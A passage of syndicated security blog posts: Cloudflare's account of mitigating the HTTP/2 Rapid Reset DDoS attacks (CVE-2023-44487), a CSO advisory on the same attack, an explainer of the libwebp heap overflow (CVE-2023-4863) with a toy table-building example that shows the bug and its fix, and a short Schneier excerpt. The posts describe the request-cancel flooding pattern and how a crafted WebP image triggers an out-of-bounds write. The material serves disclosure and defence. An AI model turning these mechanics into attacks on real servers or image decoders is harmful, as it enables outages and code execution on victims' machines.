While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don't wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response. CVE-2023-44487 is a different manifestation of an HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses of RST_STREAM are unaffected.

In addition to a direct fix, we have implemented several improvements to the server's HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns and give the server more room to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named "IP Jail". For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is "jailed", not only is it blocked from connecting to the attacked property, it is also barred from using HTTP/2 to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker's ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP-based mitigations are a very blunt tool, which is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short, so any long-term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

[Figure: daily churn of attacking IP addresses]

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

Another front on which we are making changes is observability. Returning errors to clients without being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Post Syndicated from Grant Bourzikas original http://blog.cloudflare.com/zero-day-rapid-reset-http2-record-breaking-ddos-attack/


Earlier today, Cloudflare, along with Google and Amazon AWS, disclosed the existence of a novel zero-day vulnerability dubbed the “HTTP/2 Rapid Reset” attack. This attack exploits a weakness in the HTTP/2 protocol to generate enormous, hyper-volumetric Distributed Denial of Service (DDoS) attacks. Cloudflare has mitigated a barrage of these attacks in recent months, including an attack three times larger than any previous attack we’ve observed, which exceeded 201 million requests per second (rps). Since the end of August 2023, Cloudflare has mitigated more than 1,100 other attacks with over 10 million rps — and 184 attacks that were greater than our previous DDoS record of 71 million rps.

This zero-day provided threat actors with a critical new tool in their Swiss Army knife of vulnerabilities to exploit and attack their victims at a magnitude that has never been seen before. While at times complex and challenging to combat, these attacks allowed Cloudflare the opportunity to develop purpose-built technology to mitigate the effects of the zero-day vulnerability.

If you are using Cloudflare for HTTP DDoS mitigation, you are protected. And below, we’ve included more information on this vulnerability, and resources and recommendations on what you can do to secure yourselves.

Deconstructing the attack: What every CSO needs to know

In late August 2023, our team at Cloudflare noticed a new zero-day vulnerability, developed by an unknown threat actor, that exploits the standard HTTP/2 protocol — a fundamental protocol that is critical to how the Internet and all websites work. This novel zero-day vulnerability attack, dubbed Rapid Reset, leverages HTTP/2’s stream cancellation feature by sending a request and immediately canceling it over and over.  

By automating this trivial “request, cancel, request, cancel” pattern at scale, threat actors are able to create a denial of service and take down any server or application running the standard implementation of HTTP/2. Furthermore, one crucial thing to note about the record-breaking attack is that it involved a modestly-sized botnet, consisting of roughly 20,000 machines. Cloudflare regularly detects botnets that are orders of magnitude larger than this — comprising hundreds of thousands and even millions of machines. For a relatively small botnet to output such a large volume of requests, with the potential to incapacitate nearly any server or application supporting HTTP/2, underscores how menacing this vulnerability is for unprotected networks.

Threat actors used botnets in tandem with the HTTP/2 vulnerability to amplify requests at rates we have never seen before. As a result, our team at Cloudflare experienced some intermittent edge instability. While our systems were able to mitigate the overwhelming majority of incoming attacks, the volume overloaded some components in our network, impacting a small number of customers’ performance with intermittent 4xx and 5xx errors — all of which were quickly resolved.

Once we successfully mitigated these issues and halted potential attacks for all customers, our team immediately kicked off a responsible disclosure process. We entered into conversations with industry peers to see how we could work together to help move our mission forward and safeguard the large percentage of the Internet that relies on our network prior to releasing this vulnerability to the general public.

We cover the technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack.

How are Cloudflare and the industry thwarting this attack?

There is no such thing as a “perfect disclosure.” Thwarting attacks and responding to emerging incidents requires organizations and security teams to live by an assume-breach mindset — because there will always be another zero-day, new evolving threat actor groups, and never-before-seen novel attacks and techniques.

This “assume-breach” mindset is a key foundation for information sharing and for ensuring, in instances such as this, that the Internet remains safe. While Cloudflare was experiencing and mitigating these attacks, we were also working with industry partners to guarantee that the industry at large could withstand this attack.

During the process of mitigating this attack, our Cloudflare team developed and purpose-built new technology to stop these DDoS attacks and further improve our own mitigations for this and other future attacks of massive scale. These efforts have significantly increased our overall mitigation capabilities and resiliency. If you are using Cloudflare, we are confident that you are protected.

Our team also alerted web server software partners who are developing patches to ensure this vulnerability cannot be exploited — check their websites for more information.


Disclosures are never one and done. The lifeblood of Cloudflare is to ensure a better Internet, which stems from instances such as these. When we have the opportunity to work with our industry partners and governments to ensure there are no widespread impacts on the Internet, we are doing our part in increasing the cyber resiliency of every organization no matter the size or vertical.

To gain more of an understanding around mitigation tactics and next steps on patching, register for our webinar.

What are the origins of the HTTP/2 Rapid Reset and these record-breaking attacks on Cloudflare?

It may seem odd that Cloudflare was one of the first companies to witness these attacks. Why would threat actors attack a company that has some of the most robust defenses against DDoS attacks in the world?  

The reality is that Cloudflare often sees attacks before they are turned on more vulnerable targets. Threat actors need to develop and test their tools before they deploy them in the wild. Threat actors who possess record-shattering attack methods can have an extremely difficult time testing and understanding how large and effective they are, because they don't have the infrastructure to absorb the attacks they are launching. Because of the transparency that we share on our network performance, and the measurements of attacks they could glean from our public performance charts, this threat actor was likely targeting us to understand the capabilities of the exploit.

But that testing, and the ability to see the attack early, helps us develop mitigations for the attack that benefit both our customers and industry as a whole.

From CSO to CSO: What should you do?

I have been a CSO for over 20 years, on the receiving end of countless disclosures and announcements like this. But whether it was Log4J, SolarWinds, EternalBlue, WannaCry/NotPetya, Heartbleed, or Shellshock, all of these security incidents have a commonality: a tremendous explosion that ripples across the world and creates an opportunity to completely disrupt any of the organizations that I have led, regardless of the industry or the size.

Many of these were attacks or vulnerabilities that we may have not been able to control. But regardless of whether the issue arose from something that was in my control or not, what has set any successful initiative I have led apart from those that did not lean in our favor was the ability to respond when zero-day vulnerabilities and exploits like this are identified.    

While I wish I could say that Rapid Reset may be different this time around, it is not. I am calling all CSOs — no matter if you’ve lived through the decades of security incidents that I have, or this is your first day on the job — this is the time to ensure you are protected and stand up your cyber incident response team.

We’ve kept the information restricted until today to give as many security vendors as possible the opportunity to react. However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this. Today is that day. That means that after today, threat actors will be largely aware of the HTTP/2 vulnerability; and it will inevitably become trivial to exploit and kick off the race between defenders and attackers: first to patch vs. first to exploit. Organizations should assume that systems will be tested, and take proactive measures to ensure protection.

To me, this is reminiscent of a vulnerability like Log4J, due to the many variants that are emerging daily, and will continue to come to fruition in the weeks, months, and years to come. As more researchers and threat actors experiment with the vulnerability, we may find different variants with even shorter exploit cycles that contain even more advanced bypasses.  

And just like Log4J, managing incidents like this isn’t as simple as “run the patch, now you’re done”. You need to turn incident management, patching, and evolving your security protections into ongoing processes — because the patches for each variant of a vulnerability reduce your risk, but they don’t eliminate it.

I don’t mean to be alarmist, but I will be direct: you must take this seriously. Treat this as a full active incident to ensure nothing happens to your organization.

Recommendations for a New Standard of Change

While no one security event is ever identical to the next, there are lessons that can be learned. CSOs, here are my recommendations that must be implemented immediately. Not only in this instance, but for years to come:

  • Understand your external and partner network’s external connectivity to remediate any Internet facing systems with the mitigations below.
  • Understand your existing security protection and capabilities you have to protect, detect and respond to an attack and immediately remediate any issues you have in your network.
  • Ensure your DDoS Protection resides outside of your data center because if the traffic gets to your datacenter, it will be difficult to mitigate the DDoS attack.
  • Ensure you have DDoS protection for Applications (Layer 7) and ensure you have Web Application Firewalls. Additionally as a best practice, ensure you have complete DDoS protection for DNS, Network Traffic (Layer 3) and API Firewalls
  • Ensure web server and operating system patches are deployed across all Internet Facing Web Servers. Also, ensure all automation like Terraform builds and images are fully patched so older versions of web servers are not deployed into production over the secure images by accident.
  • As a last resort, consider turning off HTTP/2 and HTTP/3 (likely also vulnerable) to mitigate the threat. This is a last resort only, because there will be significant performance issues if you downgrade to HTTP/1.1
  • Consider a secondary, cloud-based DDoS L7 provider at perimeter for resilience.

Cloudflare’s mission is to help build a better Internet. If you are concerned with your current state of DDoS protection, we are more than happy to provide you with our DDoS capabilities and resilience for free to mitigate any attempts of a successful DDoS attack. We know the stress that you are facing, as we have fought off these attacks for the last 30 days and made our already best-in-class systems even better.

If you’re interested in finding out more, we have a webinar coming up with more details on the zero-day and how to respond; you can register here. We also cover the technical details of the attack in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack. Finally, if you’re being targeted or need immediate protection, please contact your local Cloudflare representative or visit https://www.cloudflare.com/under-attack-hotline/.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Post Syndicated from Willi Geiger original http://blog.cloudflare.com/uncovering-the-hidden-webp-vulnerability-cve-2023-4863/


At Cloudflare, we're constantly vigilant when it comes to identifying vulnerabilities that could potentially affect the Internet ecosystem. Recently, on September 12, 2023, Google announced a security issue in Google Chrome, titled "Heap buffer overflow in WebP in Google Chrome," which caught our attention. Initially, it seemed like just another bug in the popular web browser. However, what we discovered was far more significant and had implications that extended well beyond Chrome.

Impact much wider than suggested

The vulnerability, tracked under CVE-2023-4863, was described as a heap buffer overflow in WebP within Google Chrome. While this description might lead one to believe that it's a problem confined solely to Chrome, the reality was quite different. It turned out to be a bug deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images.

Digging deeper, this vulnerability was in fact first reported in an earlier CVE from Apple, CVE-2023-41064, although the connection was not immediately obvious. In early September, Citizen Lab, a research lab based out of the University of Toronto, reported on an apparent exploit that was being used to attempt to install spyware on the iPhone of "an individual employed by a Washington DC-based civil society organization." The advisory from Apple was also incomplete, stating that it was a “buffer overflow issue in ImageIO,” and that they were aware the issue may have been actively exploited. Only after Google released CVE-2023-4863 did it become clear that these two issues were linked, and there was a wider vulnerability in WebP.

The vulnerability allows an attacker to create a malformed WebP image file that makes libwebp write data beyond the buffer memory allocated to the image decoder. By writing past the legal bounds of the buffer, it is possible to modify sensitive data in memory, eventually leading to execution of the attacker's code.

WebP, introduced over a decade ago, has gained widespread adoption in various applications, ranging from web browsers to email clients, chat apps, graphics programs, and even operating systems. This ubiquity meant that this vulnerability had far-reaching consequences, affecting a vast array of software and virtually all users of the WebP format.

[Figure: How the WebP vulnerability is exploited]

Understanding the technical details

So what exactly was the issue, how could it be exploited, and how was it shut down? We can get our best clues by looking at the patch that was made to libwebp. This patch fixes a potential out-of-bounds (OOB) write in part of the image decoder – the Huffman tables – with two changes: additional validation of the input data, and a modified dynamic memory allocation model. A deeper dive into libwebp and the WebP image format built on top of it reveals what this means.

WebP is a combination of two different image formats: a lossy format similar to JPEG using the VP8 codec, and a lossless format using WebP's custom lossless codec. The bug was in the lossless codec's handling of Huffman coding.

The fundamental idea behind Huffman coding is that using a constant number of bits for every basic unit of information in a dataset – like a pixel color – is not the most efficient representation. We can use a variable number of bits, and assign shortest sequences to the most frequently occurring values, and longer ones to the least common values. The sequences of ones and zeros can be represented as a binary tree, with the shorter, more common codes near the root, and longer, less common codes deeper in the tree. Looking up values in the tree bit by bit is relatively slow. Practical implementations build lookup tables that allow matching many bits at a time.

Image files contain compact information about the shape of the Huffman tree, which the decoder uses to reconstruct the tree, and build lookup tables for the codes. The bug in libwebp was in the code building the lookup tables. A specially crafted WebP file can contain a very unbalanced Huffman tree that contains codes much longer than any normal WebP file would have, and this made the function generating lookup tables write data beyond the buffer allocated for the lookup tables. Libwebp had checks for validity of the Huffman tree, but it would write the invalid lookup tables before the consistency check.

The buffer for lookup tables is allocated on the heap. Heap is an area of memory where most of the data of the application is stored. Code that writes data past its buffer allows attackers to modify and corrupt data that happens to be adjacent in memory to the buffer. This can be exploited to make the application misbehave, and eventually start executing code supplied by the attacker.

The fixed version of libwebp ensures that the input data will always create a valid internal structure, and if so, allocates more memory if necessary to ensure the buffer is always big enough.
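To make the failure mode concrete, here is a toy canonical-Huffman table builder in the spirit of the bug; this is our illustration, not libwebp's actual code. The table is sized for codes up to MAX_BITS, and the length check marked FIX is what stands between a crafted file and an out-of-bounds write. Java throws an exception on a bad index, but C has no such runtime check, so the equivalent C code silently corrupts adjacent heap memory:

class HuffmanTable {
    static final int MAX_BITS = 8;              // table indexed 8 bits at a time
    final int[] table = new int[1 << MAX_BITS]; // 256 entries

    // lens must be sorted ascending for canonical code assignment.
    void build(int[] lens, int[] syms) {
        int code = 0, prevLen = 0;
        for (int i = 0; i < lens.length; i++) {
            code <<= (lens[i] - prevLen);         // canonical Huffman code assignment
            prevLen = lens[i];
            if (lens[i] > MAX_BITS)               // FIX: validate *before* writing; real
                throw new IllegalArgumentException("invalid Huffman tree"); // code must
                                                  // also reject oversubscribed trees
            int span = 1 << (MAX_BITS - lens[i]); // table slots this code covers
            int base = code << (MAX_BITS - lens[i]);
            for (int j = 0; j < span; j++)
                table[base + j] = syms[i];        // with an invalid tree, base + span
                                                  // can run past the end of the table
            code++;
        }
    }
}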

Libwebp is a mature library, maintained by seasoned professionals. But it's written in the C language, which has very few safeguards against programming errors, especially memory use. Despite the care taken in the library's development, a single erroneous assumption led to a critical vulnerability.

Swift action

On the same day that Google's announcement caught our attention, we filed an internal security ticket, to document and address the vulnerability.

Google was initially perplexed about the true source of the problem. They did not release a patched version of libwebp before announcing the vulnerability. We discovered the yet-unreleased patch for libwebp in its repository, and used it to update libwebp in our services. libwebp officially released the patch a day later.

Our image processing services are written in Rust. We've submitted patches to Rust packages that contained a copy of libwebp and filed RustSec advisories for them (RUSTSEC-2023-0061 and RUSTSEC-2023-0062). This ensured that the broader Rust ecosystem was informed and could take appropriate action.

In an interesting turn of events, GitHub's vulnerability scanner was quick to recognize our RustSec reports as the first case of CVE-2023-4863, even before the issue gained widespread attention. This highlights the importance of having robust security reporting mechanisms in place and the vital role that platforms like GitHub play in keeping the open-source community secure.

These quick actions demonstrate how seriously Cloudflare takes this kind of threat. We have a belt-and-suspenders approach to security that limits the binaries we run at our edge to those signed by us, and ensures that all vulnerabilities are identified and remedied as soon as possible. In this case, we have scrutinized our logs, and found no evidence that any attackers attempted to leverage this vulnerability against Cloudflare. We believe this exploit targeted individuals rather than the infrastructure of a company like Cloudflare, but we never take chances with our customers’ data, and so fixed this vulnerability as quickly as possible, before it became well known.

Conclusion

Google has now widened its description of this issue, correctly calling out that all uses of WebP are potentially affected. This widened description was originally filed as yet another new CVE – CVE-2023-5129 – but then that was flagged as a duplicate of the original CVE-2023-4863, and the description of the earlier filing updated. This incident serves as a reminder of the complex and interconnected nature of the internet ecosystem. What initially seemed like a Chrome-specific problem revealed a much deeper issue that touched nearly every corner of the digital world. The incident also showcased the importance of swift collaboration and the critical role that responsible disclosure plays in mitigating security risks.

For each and every user, it demonstrates the need to keep all browsers, apps and operating systems up to date, and to install recommended security patches. All applications supporting WebP images need to be updated. We've updated our services.

At Cloudflare, we remain committed to enhancing the security of the internet, and incidents like these drive us to continually refine our processes and strengthen our partnerships within the global developer community. By working together, we can make the Internet a safer place for everyone.

Critical Vulnerability in libwebp Library

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/critical-vulnerability-in-libwebp-library.html

Both Apple and Google have recently reported critical vulnerabilities in their systems—iOS and Chrome, respectively—that are ultimately the result of the same vulnerability in the libwebp library:

On Thursday, researchers from security firm Rezillion published evidence that they said made it “highly likely” both indeed stemmed from the same bug, specifically in libwebp, the code library that apps, operating systems, and other code libraries incorporate to process WebP images.

Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems that developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.